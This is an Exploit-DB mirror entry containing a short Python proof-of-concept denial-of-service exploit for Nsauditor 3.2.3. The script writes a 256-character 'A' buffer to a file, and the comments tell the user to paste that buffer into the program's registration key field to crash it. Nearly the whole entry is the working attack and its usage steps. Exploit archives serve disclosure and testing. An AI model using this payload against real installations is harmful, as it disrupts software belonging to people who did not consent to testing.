exploit-db-mirror/exploits/windows/dos/49965.py
Offensive Security a32743b8b4 DB: 2021-06-09
4 changes to exploits/shellcodes

NBMonitor 1.6.8 - Denial of Service (PoC)
Nsauditor 3.2.3 - Denial of Service (PoC)

Backup Key Recovery 2.2.7 - Denial of Service (PoC)

WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)
2021-06-09 05:01:55 +00:00

21 lines
No EOL
605 B
Python
Executable file

# Exploit Title: Nsauditor 3.2.3 - Denial of Service (PoC)
# Date: 07/06/2021
# Author: Erick Galindo
# Vendor Homepage: http://www.nsauditor.com
# Software http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.3.0
# Tested on: Windows 10 Pro x64 es
# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Open Nsauditor.exe
#3.- Go to Register > Enter Registration Code...
#4.- Write anything in 'Name' field
#5.- Paste clipboard in 'Key' field
#6.- Click on button -> Ok
buffer = "\x41" * 256
f = open ("NBM.txt", "w")
f.write(buffer)
f.close()